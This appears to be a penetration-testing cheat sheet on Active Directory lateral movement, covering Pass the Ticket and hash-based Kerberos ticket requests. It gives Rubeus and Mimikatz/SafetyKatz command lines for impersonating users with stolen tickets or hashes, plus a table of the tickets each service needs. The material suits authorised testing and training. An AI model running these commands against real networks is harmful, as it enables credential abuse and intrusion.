Lateral Movement
In this section, you will find some techniques in order to perform lateral movements on Active Directory infrastructuree.
In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.
You can perform this technique with Rubeus.
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
Depending on the ticket you have you can do certain tasks.
Service Type | Required Tickets |
|---|---|
Windows File Share (PsExec) | CIFS |
LDAP Operations (DSync) | LDAP |
WinRM | HOST
HTTP
WINRM |
WMI | HOST
RPCSS |
Powershell Remoting | HOST
HTTP
Depending on OS:
WSMAN
RPCSS |
Schedule Taks | Host |
Windows Remote Server Administration Tools | RPCSS
LDAP
CIFS |
Golden Tickets | krbtgt |
This technique allows requesting a Kerberos TGT from a user using their NTLM or AES/RC4 hash.
- Does not require high privileges
.\Rubeus.exe asktgt /nowrap /user:<USER> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /opsec /show /ptt createnetonly /program:C:\Windows\System32\cmd.exe
- Requires high privileges
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<aes256key> run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<aes256keys> /run:cmd.exe" "exit"
Last modified 2mo ago